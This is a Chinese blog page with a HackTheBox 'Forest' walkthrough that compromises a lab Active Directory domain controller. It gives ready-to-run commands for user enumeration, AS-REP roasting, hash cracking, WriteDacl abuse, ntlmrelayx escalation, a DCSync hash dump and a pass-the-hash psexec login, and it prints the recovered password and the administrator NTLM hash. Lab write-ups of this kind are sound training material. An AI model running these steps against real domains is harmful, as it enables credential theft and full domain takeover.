<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="Td">
    
    <title>
        
            Forest - HackTheBox |
        
        Td
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="/images/142100769.png">
    
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/font/css/fontawesome.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/font/css/regular.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/font/css/solid.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/font/css/brands.min.css">
    
        
            
        
    
    <script id="hexo-configurations">
    let KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"example.com","root":"/","language":"zh-CN","path":"search.xml"}
    KEEP.theme_config = {"toc":{"enable":true,"number":true,"expand_all":false,"init_open":true,"layout":"right"},"style":{"primary_color":"#0066cc","logo":"/images/142100769.png","favicon":"/images/142100769.png","avatar":"/images/142100769.png","first_screen":{"enable":true,"header_transparent":true,"background_img":"/images/","description":null,"hitokoto":true},"scroll":{"progress_bar":true,"percent":true}},"local_search":{"enable":true,"preload":true},"code_block":{"tools":{"enable":false,"style":"default"},"highlight_theme":"default"},"side_tools":{},"pjax":{"enable":true},"lazyload":{"enable":true},"comment":{"enable":false,"use":"valine","valine":{"appid":null,"appkey":null,"server_urls":null,"placeholder":null},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.8"},"waline":{"server_url":null,"reaction":false,"version":2},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false}},"post":{"author_label":{"enable":false,"auto":true,"custom_label_list":["Trainee","Engineer","Architect"]},"word_count":{"wordcount":false,"min2read":false},"datetime_format":"YYYY-MM-DD HH:mm:ss","copyright_info":false},"website_count":{"busuanzi_count":{"enable":false,"site_uv":false,"site_pv":false,"page_pv":false}},"version":"3.7.3"}
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"}
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"}
    KEEP.language_copy_copyright = {"copy":"复制版权信息","copied":"已复制","title":"原文标题","author":"原文作者","link":"原文链接"}
  </script>



<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    
        <span class="scroll-progress-bar"></span>
    

    
        <span class="pjax-progress-bar"></span>
        <i class="pjax-progress-icon fas fa-circle-notch fa-spin"></i>
    
</div>


<main class="page-container border-box">

    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="/images/142100769.png">
                </a>
            
            <a class="site-name border-box" href="/">
               Td
            </a>
        </div>

        <div class="right border-box">
            <div class="pc">
                <ul class="menu-list">
                    
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                首页
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                归档
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >
                                标签
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">首页</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags">标签</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">

                

                    <div class="fade-in-down-animation">
    <div class="post-page-container border-box">

        <div class="article-content-container border-box">

            <div class="article-title">
                <span class="title-hover-animation">Forest - HackTheBox</span>
            </div>

            
                <div class="article-header border-box">
                    
                        <div class="avatar-box border-box">
                            <img src="/images/142100769.png">
                        </div>
                    
                    <div class="info-box">
                        <div class="author">
                            <span class="name">Td</span>
                            
                        </div>
                        <div class="meta-info border-box">
                            

<div class="article-meta-info-container border-box post">
    <div class="article-meta-info border-box">
        


        
            <span class="meta-info-item article-create-date">
                <i class="icon fa-solid fa-calendar-check"></i>&nbsp;
                <span class="pc">2023-05-13 18:26:47</span>
                <span class="mobile">2023-05-13 18:26</span>
            </span>

            <span class="meta-info-item article-update-date">
                <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                <span class="pc">2023-05-13 18:26:47</span>
            </span>
        

        
            <span class="meta-info-item article-category border-box"><i class="icon fas fa-folder"></i>&nbsp;
                <ul>
                    
                </ul>
            </span>
        

        
            <span class="article-tag meta-info-item border-box">
                <i class="icon fas fa-tags"></i>&nbsp;
                <ul>
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/Hack-The-Box/">Hack-The-Box</a></li>
                        
                    
                </ul>
            </span>
        

        
        
        
        
    </div>

    
</div>

                        </div>
                    </div>
                </div>
            

            <div class="article-content keep-markdown-body">
                

                <p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.4r9c90jd48a0.webp"
                     
                ></p>
<p>nmap扫描</p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.19etbmmbgv28.webp"
                     
                ></p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.4p99iyylx380.webp"
                     
                ></p>
<p>先看看http端口</p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.2rvmk7o91dk0.webp"
                     
                ></p>
<p>从上往下尝试</p>
<p>53端口DNS解析可以爆破子域名</p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.xovzw596ij.webp"
                     
                ></p>
<p>在389端口扫描信息中发现一个域名，利用nslookup可以查看解析</p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.1t4cglm5epr4.webp"
                     
                ></p>
<p>但这里没有http服务，爆破子域名意义不大，将其添加到hosts文件</p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.5oirebabz0c0.webp"
                     
                ></p>
<p>88端口可以用kerbrute进行枚举</p>
<p><code>https://github.com/ropnop/kerbrute</code></p>
<p><code>./kerbrute_linux_amd64 userenum --dc 10.10.10.161 -d htb.local /usr/share/wordlists/wfuzz/others/names.txt</code></p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.5cjvrst9owg0.webp"
                     
                ></p>
<p>枚举出了一堆用户名</p>
<p>在进行389端口ldap测试</p>
<p><code>ldapsearch -x -H ldap://10.10.10.161 -b &quot;DC=htb,DC=local&quot; -s sub</code></p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.zrq8o6bi8sg.webp"
                     
                ></p>
<p>太多了，过滤一下</p>
<p><code>ldapsearch -x -H ldap://10.10.10.161 -b &quot;DC=htb,DC=local&quot; -s sub|grep -i account</code></p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.3rwai29lq78.webp"
                     
                ></p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.2xiutwrw1g40.webp"
                     
                ></p>
<p>发现一个疑似用户名，再用kerbrute测试一下</p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.207gsfal1hgg.webp"
                     
                ></p>
<p>确实存在</p>
<p>尝试获取票据</p>
<p><code>https://github.com/fortra/impacket/blob/master/examples/GetNPUsers.py</code></p>
<p><code>python getnpuser.py -dc-ip 10.10.10.161 htb.local/svc-alfresco -request</code></p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.6j7mitnfmvg0.webp"
                     
                ></p>
<p>密码直接回车为空</p>
<p>尝试爆破一下密文</p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.5s4mv1mw9uw0.webp"
                     
                ></p>
<p>通过特征查找密文类型</p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.x57bp2463ow.webp"
                     
                ></p>
<p><code>hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt</code></p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.znzjil2tp74.webp"
                     
                ></p>
<p>得到明文密码</p>
<p>用该账户的用户名和密码去测试445端口smb服务</p>
<p><code>smbmap -H 10.10.10.161 -u svc-alfresco -p s3rvice</code></p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.47gybddqs4c0.webp"
                     
                ></p>
<p>发现共享文件夹，两个无权限，三个有读权限</p>
<p>如果admin目录拥有可读写权限的情况，可以使用psexec.py进行登录</p>
<p><code>https://github.com/fortra/impacket/blob/master/examples/psexec.py</code></p>
<p><code>python psexec.py -dc-ip 10.10.10.161 htb.local/svc-alfresco:s3rvice@10.10.10.161</code></p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.3xo5n2m5yug0.webp"
                     
                ></p>
<p>查看其他目录</p>
<p>最终发现SYSVOL下有文件</p>
<p><code>smbclient //10.10.10.161/SYSVOL -U svc-alfresco%s3rvice</code></p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.3pnr7adfcwu0.webp"
                     
                ></p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.1e23rwvaow00.webp"
                     
                ></p>
<p><code>https://adsecurity.org/?p=2288</code></p>
<p>在Policies下，可能会存在一个xml文件，文件中会包含账户和明文密码</p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.418y43nudoy0.webp"
                     
                ></p>
<p>但这里并没有</p>
<p>得到了明文密码，尝试利用evil_winrm通过5985端口进行登录</p>
<p><code>evil-winrm -u svc-alfresco -p s3rvice -i 10.10.10.161</code></p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.6dh8tmkut6w0.webp"
                     
                ></p>
<p>提权</p>
<p>使用BloodHound进行域控的信息收集</p>
<p><code>https://blog.csdn.net/qq_48904485/article/details/124403996</code></p>
<p><code>https://github.com/BloodHoundAD/SharpHound</code></p>
<p>该说不说，这玩意有点折腾</p>
<p>将收集信息的exe程序上传到靶机</p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.6yrossx1kio0.webp"
                     
                ></p>
<p><code>upload SharpHound.exe</code></p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.1ahphbkhiqww.webp"
                     
                ></p>
<p>运行即可</p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.6izjuuunfao0.webp"
                     
                ></p>
<p>运行结束后，会在当前目录生成一个zip压缩包</p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.6ynctzpi1cg0.webp"
                     
                ></p>
<p>将压缩包下载到本地</p>
<p><code>download 20230430003452_BloodHound.zip</code></p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.4gdy1umrqlm0.webp"
                     
                ></p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.73gjyu5hp4w0.webp"
                     
                ></p>
<p>将压缩包上传到BloodHound中</p>
<p>在点击</p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.4k4uanqw8200.webp"
                     
                ></p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.1lf64a54wj28.webp"
                     
                ></p>
<p>这里会给出当前用户所在组以及更高一层组，直到域控制器的路线图</p>
<p>在HTB.LOCAL的域控制器前一步，看到一个EXCHANGE WINDOWS对其拥有WriteDacl权限</p>
<p>这个权限可以对域控制器上的所有DACL进行读写修改</p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.7esl7zc8lys0.webp"
                     
                ></p>
<p>先创建一个普通用户</p>
<p><code>net user test123 1qaz@WSX /add /domain</code></p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.6wnkqrxw9nk0.webp"
                     
                ></p>
<p>在将用户添加到<code>Exchange Windows Permissions</code>组和远程登录的<code>Remote Management Users</code>组中</p>
<p>一个是域内的拥有DACL读写权限的组，一个是本地的远程登陆的组</p>
<p><code>net group &#39;Exchange Windows Permissions&#39; test123 /add /domain</code></p>
<p><code>net localgroup &#39;Remote Management Users&#39; test123 /add</code></p>
<p>在利用创建好的用户进行登录</p>
<p><code>evil-winrm -u test123 -p 1qaz@WSX -i 10.10.10.161</code></p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.b8b5l6hajts.webp"
                     
                ></p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.118su3zpv5s0.webp"
                     
                ></p>
<p>然后使用<code>secretsdump.py</code>进行抓取administrator的哈希值密码</p>
<p><code>https://github.com/fortra/impacket/blob/impacket_0_9_22/examples/secretsdump.py</code></p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.3xtys0vgn6k0.webp"
                     
                ></p>
<p>但是貌似无用</p>
<p>得先用<code>ntlmrelayx.py</code>进行一个类似建立连接的做法</p>
<p><code>https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py</code></p>
<p><code>python ntml.py -t ldap://10.10.10.161 --escalate-user test123</code></p>
<p>之后访问<code>localhost:80</code></p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.25heiuyg17kw.webp"
                     
                ></p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.2kw5dxnccck0.webp"
                     
                ></p>
<p>在这输入test123的账户和密码</p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.6qsnzjscad40.webp"
                     
                ></p>
<p>在尝试获取哈希值</p>
<p><code>python3 dump.py htb.local/test123@10.10.10.161 -dc-ip 10.10.10.161 -just-dc</code></p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.4p00box81t60.webp"
                     
                ></p>
<p>利用psexec.py使用哈希值登录</p>
<p><code>python psexec.py htb.local/administrator@10.10.10.161 &#39;powershell.exe&#39; -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6</code></p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.7kdcvg0yf900.webp"
                     
                ></p>
<p>就是这shell有点奇奇怪怪的</p>
<p><img  
                     lazyload
                     alt="image"
                     data-src="https://cdn.jsdelivr.net/gh/Tddddddddd/picx-images-hosting@master/HackTheBox/Forest/image.63yvvx39mu40.webp"
                     
                ></p>
<hr>
<p>其实evil和psexec这些，kali都是自带的，在impacket套件里面。。</p>

            </div>

            

            
                <ul class="post-tags-box">
                    
                        <li class="tag-item">
                            <a href="/tags/Hack-The-Box/"><i class="icon fas fa-hashtag"></i>Hack-The-Box</a>&nbsp;
                        </li>
                    
                </ul>
            

            
                <div class="article-nav">
                    
                        <div class="article-prev">
                            <a class="prev"
                               rel="prev"
                               href="/post/6d3d0a61ddb1/"
                            >
                            <span class="left arrow-icon flex-center">
                              <i class="fas fa-chevron-left"></i>
                            </span>
                                <span class="title flex-center">
                                <span class="post-nav-title-item text-ellipsis">Bankrobber - HackTheBox</span>
                                <span class="post-nav-item">上一篇</span>
                            </span>
                            </a>
                        </div>
                    
                    
                        <div class="article-next">
                            <a class="next"
                               rel="next"
                               href="/post/c089cde000c7/"
                            >
                            <span class="title flex-center">
                                <span class="post-nav-title-item text-ellipsis">Chatterbox - HackTheBox</span>
                                <span class="post-nav-item">下一篇</span>
                            </span>
                                <span class="right arrow-icon flex-center">
                              <i class="fas fa-chevron-right"></i>
                            </span>
                            </a>
                        </div>
                    
                </div>
            

            
                






            
        </div>

        
            <div class="pc-post-toc right-toc">
                <div class="post-toc-wrap">
    <div class="post-toc">
        
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="border-box website-info-box default">
        
            <div class="copyright-info info-item default">
                &copy;&nbsp;<span>2022</span>&nbsp;-&nbsp;2025
                
                    &nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;&nbsp;<a href="/">Td</a>
                
            </div>

            <div class="theme-info info-item default">
                由&nbsp;<a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;驱动&nbsp;|&nbsp;主题&nbsp;<a class="theme-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep v3.7.3</a>
            </div>

            

            
        

        <div class="count-item info-item default">
            

            

            
        </div>
    </div>
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="tools-list border-box">
        <!-- PC TOC show toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- PC go comment -->
        
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container">
    <ul class="side-tools-list">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list">
        
            <li class="tools-item toggle-show-toc-tablet flex-center">
                <i class="fas fa-list"></i>
            </li>
        

        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        
            <li class="tools-item tool-scroll-to-top flex-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

    <!-- tablet toc -->
    
        <div class="tablet-post-toc-mask">
            <div class="tablet-post-toc">
                <div class="post-toc-wrap">
    <div class="post-toc">
        
    </div>
</div>

            </div>
        </div>
    
</main>



<script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/utils.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/main.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/header-shrink.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/back2top.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/dark-light-toggle.js"></script>




    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/local-search.js"></script>





    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/lazyload.js"></script>


<div class="post-scripts pjax">
    
        <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/post-helper.js"></script>
        
            <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/libs/anime.min.js"></script>
        
        
            <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/toc.js"></script>
        
    
    
    
</div>


    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/libs/pjax.min.js"></script>
<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax'
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            KEEP.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            KEEP.utils.pjaxProgressBarEnd();
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            KEEP.refresh();
        });
    });
</script>




    
        
            
<script src="/js/custom.js"></script>

        
    

</body>
</html>
